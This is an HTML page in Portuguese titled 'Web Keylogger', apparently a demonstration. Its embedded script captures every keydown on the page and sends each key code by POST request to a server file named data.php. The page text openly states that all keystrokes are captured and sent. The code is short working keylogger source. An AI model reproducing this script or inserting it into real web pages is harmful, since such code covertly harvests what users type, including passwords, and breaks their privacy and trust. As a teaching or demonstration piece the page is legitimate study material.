<!DOCTYPE html>
<html lang="pt-br">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Web Keylogger</title>

	<style>
		* {
			margin: 0;
			padding: 0;
			box-sizing: border-box;
			font-family: Arial, sans-serif;
		}
		
		body {
			background-color: #f5f5f5;
			color: #444;
			line-height: 1.5;
		}
		
		header {
			background-color: #fff;
			border-bottom: 1px solid #ccc;
			padding: 20px;
			text-align: center;
		}
		
		h1 {
			font-size: 2.5rem;
			font-weight: bold;
			color: #444;
			margin: 0;
		}
		
		main {
			padding: 20px;
			max-width: 1200px;
			margin: 0 auto;
		}
		
		h2 {
			font-size: 1.8rem;
			font-weight: bold;
			color: #333;
			margin: 30px 0 20px;
		}
		
		p {
			font-size: 1.2rem;
			color: #666;
			margin-bottom: 20px;
		}
		
		section {
			padding: 30px;
			background-color: #fff;
			border-radius: 5px;
			box-shadow: 0 2px 4px rgba(0,0,0,0.1);
			margin-bottom: 30px;
		}
		
		@media (max-width: 768px) {
			h1 {
				font-size: 2rem;
			}
			
			h2 {
				font-size: 1.5rem;
			}
			
			p {
				font-size: 1.1rem;
			}
			
			section {
				padding: 20px;
			}
		}
		
		@media (max-width: 576px) {
			h1 {
				font-size: 1.8rem;
			}
			
			h2 {
				font-size: 1.3rem;
			}
			
			p {
				font-size: 1rem;
			}
			
			section {
				padding: 10px;
			}
		}
	</style>

	<script>
		/**
		 * XMLHttpRequest
		 */
		let xhr = new XMLHttpRequest();

		/**
		 * Efetua a captura das teclas pressionadas
		 */
		document.addEventListener('keydown', (e) => {
			let keyPressed = e.keyCode;
			let data = 'key='+keyPressed;

			/**
		 	 *  Efetua a requisição
		 	 */
			xhr.open('POST', 'data.php', true);
			xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
			xhr.send(data);
		});
	</script>
</head>
<body>
	<header>
		<h1>Web Keylogger</h1>
	</header>
	
	<main>
		<section id="sobre">
			<h2>Sobre</h2>
			<p>Todas as teclas pressionadas nesta página, serão capturadas e enviadas por meio de uma requisição POST para o arquivo data.php no servidor;</p>
		</section>
</body>
</html>
